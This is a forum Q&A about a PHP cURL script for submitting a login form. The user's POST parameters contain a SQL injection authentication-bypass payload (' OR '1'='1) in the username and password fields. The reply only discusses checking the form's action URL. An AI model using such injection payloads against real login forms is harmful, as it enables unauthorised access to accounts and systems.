I’m simply trying to automatically login to a login form via php and cURL
I have:
<?php
# get url to form
$url = "http://thesite.com/login.php";
$ch = curl_init($url); # initialize that form
#run value of $_POST variable in form fields from above url.
$params = "username='' OR '1'='1&password='' OR '1'='1&login-php-submit-button=submit";
## set cURL options
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $params); #set parameter $_POST fields
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
if (!$response) {
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch); // make sure we closeany current curl sessions
die(stripslashes($http_code.' Can\'t connect to server.'));
}
//curl_close($ch); // close curl session
## echo the result from cURL 'ing
echo $response;
curl_close($ch);
?>
When I visit this script it just shows the value of $url as if I just visited the URL, it doesnt show any error messages like “Wrong pass” or anything.
I feel like $params may not be setup correctly here. I have tried relentlessly to try to get this to work. I currently have it setup where the setup for $params values are:
formnameofinputvalue=valueToInputIntoFormElement&
where & separates each formInputName=formInputValue
Anyone see what I am doing wrong here? Thank you.
Does the login.php script submit the values to another URL? Check the source for the login.php page and see if the form is submitting to another URL (action= in the form element). If so, you will want to use that URL instead since that is where the values are being submitted. The login.php is only the form to collect the values.
On the other hand, login.php might submit to itself, in which case you have the right URL.